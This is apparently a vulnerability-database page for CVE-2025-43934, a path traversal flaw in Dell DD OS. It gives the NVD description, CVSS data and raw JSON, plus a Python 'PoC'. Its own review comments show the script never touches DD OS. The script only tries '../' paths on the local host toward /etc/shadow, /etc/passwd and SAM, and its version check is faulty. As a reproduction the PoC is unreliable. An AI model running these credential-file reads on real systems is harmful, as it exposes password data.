Security Vulnerability Report
CVE-2025-43934 CVSS 6.0 MEDIUM

CVE-2025-43934

Published: 2025-10-07 19:15:38
Last Modified: 2025-10-14 20:08:46

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service and Unauthorized access.

CVSS Details

CVSS Score
6.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.3.0.15
Dell PowerProtect Data Domain DD OS LTS2025 Release 8.3.1.0
Dell PowerProtect Data Domain DD OS LTS2024 Release 7.13.1.0 - 7.13.1.30
Dell PowerProtect Data Domain DD OS LTS 2023 Release 7.10.1.0 - 7.10.1.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43934 - Dell PowerProtect Data Domain Path Traversal PoC
# This PoC demonstrates the path traversal vulnerability in DD OS
# Note: This requires local access and high privileges on the target system
#
# NOTE(review): nothing in this script talks to a DD OS component. The two
# functions below only run a local command and probe the local filesystem of
# whatever host executes the script, using that process's own privileges, so
# this is a generic "../" probe rather than a reproduction of the vendor-reported
# defect. A "SUCCESS" line is evidence about the host's file permissions, not
# about CVE-2025-43934. Per the NVD range data attached to this report the
# affected trains end before 7.10.1.70, 7.13.1.40 and 8.3.1.10 (and at 8.3.0.15
# inclusive); the vendor advisory DSA-2025-333 in the references is the
# authoritative fix list.

import os
import sys  # unused


def exploit_path_traversal(target_path):
    """
    Exploit path traversal vulnerability by constructing malicious paths
    with directory traversal sequences (../)

    Joins each sequence in ``traversal_sequences`` onto a hard-coded base
    directory and reports whether the resulting *local* path exists and can be
    opened for reading.

    Args:
        target_path: accepted but never used; the base directory is the
            hard-coded ``normal_path`` below.

    Returns:
        True after the first sequence whose path exists (the file is opened and
        its first 100 characters printed), False if none of them exists.
    """
    # Normal path that should be restricted
    normal_path = "/data/backup/"

    # Malicious path using path traversal to access restricted directories
    # For example, trying to access /etc/shadow or other sensitive files
    traversal_sequences = [
        "../../../etc/shadow",
        "../../../../etc/passwd",
        "../../../../etc/dd_system/config",
        "../" * 10 + "etc/shadow",
        # On a POSIX host os.path.join keeps the backslashes as ordinary
        # filename characters, so this entry can only match a literal file of
        # that name directly under normal_path.
        "..\\..\\..\\windows\\system32\\config\\SAM",
        # Absolute second argument: os.path.join discards normal_path, so the
        # probe is simply this path as written.
        "/data/backup/../../etc/shadow",
    ]

    for seq in traversal_sequences:
        malicious_path = os.path.join(normal_path, seq)
        print(f"[*] Attempting path traversal with: {malicious_path}")

        try:
            # Attempt to access the file using the malicious path
            # os.path.exists resolves ".." against the real local filesystem of
            # the host running this script; no DD OS path check is exercised.
            if os.path.exists(malicious_path):
                # Printed before open(), so an existing directory or an
                # unreadable file also produces this line.
                print(f"[+] SUCCESS: Accessed restricted file: {malicious_path}")
                with open(malicious_path, 'r') as f:
                    content = f.read(100)  # Read first 100 chars
                    # The slice is redundant: at most 100 characters were read.
                    print(f"[+] Content preview: {content[:100]}")
                return True
        except PermissionError:
            print(f"[-] Permission denied for: {malicious_path}")
        except Exception as e:
            # Any other failure (e.g. IsADirectoryError, a decode error) is
            # reported and the next sequence is tried.
            print(f"[-] Error accessing {malicious_path}: {e}")

    return False


def check_vulnerable_system():
    """
    Check if the system is potentially vulnerable

    Runs ``ddos version`` and substring-matches its stdout against a fixed
    list of version strings.

    Returns:
        True on the first substring match, False when nothing matches or the
        command cannot be run.

    NOTE(review): the list does not encode the affected ranges given in the
    advisory text (Feature Release 7.7.1.0 through 8.3.0.15 spans releases
    that are absent here), and ``ver in result.stdout`` is a plain substring
    test, so "7.7.1.1" also matches e.g. "7.7.1.15". Expect both false
    negatives and false positives; a reliable check parses the version into a
    tuple and compares it against the documented ranges.
    """
    # Check DD OS version
    try:
        import subprocess
        # assumes a `ddos` executable with a `version` subcommand is on PATH —
        # not verified here; a missing binary raises FileNotFoundError, which
        # the broad except below turns into "Could not determine".
        result = subprocess.run(["ddos", "version"], capture_output=True, text=True)
        print(f"[*] DD OS Version: {result.stdout}")

        # Vulnerable versions
        # Incomplete relative to the advisory ranges; see the docstring.
        vulnerable_versions = [
            "7.7.1.0", "7.7.1.1", "7.7.1.2", "7.7.1.3", "7.7.1.4", "7.7.1.5",
            "7.10.1.0", "7.10.1.10", "7.10.1.20", "7.10.1.30", "7.10.1.40", "7.10.1.50", "7.10.1.60",
            "7.13.1.0", "7.13.1.10", "7.13.1.20", "7.13.1.30",
            "8.3.0.0", "8.3.0.1", "8.3.0.5", "8.3.0.10", "8.3.0.15",
            "8.3.1.0"
        ]

        for ver in vulnerable_versions:
            # Substring test, not a version comparison (see docstring).
            if ver in result.stdout:
                print(f"[!] VULNERABLE: DD OS version {ver} is affected by CVE-2025-43934")
                return True
    except Exception as e:
        # Swallows every failure (missing binary, non-zero exit, decode error)
        # and reports it as "unknown".
        print(f"[-] Could not determine DD OS version: {e}")

    return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-43934 - Dell PowerProtect Data Domain Path Traversal")
    print("=" * 60)

    # Both branches call exploit_path_traversal with the same argument, so the
    # version check only changes the message that is printed; it does not gate
    # the filesystem probe.
    if check_vulnerable_system():
        print("\n[*] System appears vulnerable. Attempting exploitation...")
        exploit_path_traversal("/data/backup/")
    else:
        print("\n[-] System does not appear to be vulnerable or version unknown.")
        print("[*] Attempting generic path traversal test...")
        exploit_path_traversal("/data/backup/")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43934", "sourceIdentifier": "[email protected]", "published": "2025-10-07T19:15:38.237", "lastModified": "2025-10-14T20:08:46.373", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.3.0.15, LTS2025 release version 8.3.1.0, LTS2024 release versions 7.13.1.0 through 7.13.1.30, LTS 2023 release versions 7.10.1.0 through 7.10.1.60, contain an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service and Unauthorized access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.70", "matchCriteriaId": "7FCE50EA-F2B8-4455-A489-1947B0CBFEEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.40", "matchCriteriaId": "C0EA46C5-6776-411A-8FBC-5B32BC216888"}, {"vulnerable": true, "criteria": 
"cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.0.0", "versionEndIncluding": "8.3.0.15", "matchCriteriaId": "F1DB489A-E2CF-4477-A08B-101B569A714E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.10", "matchCriteriaId": "9E0743E3-14E7-4FF9-88C5-E038D62F2344"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000376224/dsa-2025-333-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}